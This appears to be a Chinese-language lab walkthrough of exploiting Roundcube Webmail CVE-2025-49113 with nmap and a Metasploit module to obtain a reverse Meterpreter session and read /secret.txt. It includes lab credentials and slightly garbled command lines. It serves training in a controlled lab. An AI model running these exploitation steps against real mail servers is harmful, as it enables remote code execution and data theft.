针对Roundcube Webmail CVE-2025-49113(经过身份验证的PHP对象反序列化→远程代码执行)的动手实践漏洞利用实验室,用于读取/secret.txt。
"免责声明:仅供教育用途"
本仓库记录了我在受控实验室中逐步利用 Roundcube Webmail CVE-2025-49113 以获取存储在 /secret.txt 中秘密的过程。
⚠️ 免责声明
所有工作均针对我拥有测试授权的实验室/训练环境进行。
请勿将这些技术用于你不拥有或未管理权限的系统。
Roundcube Webmail 是一款基于浏览器、开源的 PHP 电子邮件客户端,通过 IMAP 连接邮箱并通过 SMTP 发送邮件。它通常运行在 Apache 或 Nginx 上,配合 MySQL/PostgreSQL/SQLite,广泛用于共享托管环境。
漏洞 – CVE-2025-49113
所有 Roundcube 版本直至并包括 1.6.10(以及 1.5.10 之前的 1.5.x 版本)在 program/actions/settings/upload.php 中存在一个严重 bug。_from 参数未经过适当验证,使得认证攻击者能够触发不安全的 PHP 对象反序列化,从而以 Web 服务器权限实现远程代码执行。
实验室凭据:
roundcubercpass目标:
/secret.txt文件中的秘密是什么?
nmapmsfconsole(Metasploit 6)172.20.2.57 上的 Roundcube Webmailexploit/multi/http/roundcube_auth_rce_cve_2025_49113命令: nmap -sV 目标主机
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS 目标主机 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali 主机 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME 目标主机 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD 目标主机
meterpreter > cat /secret.txt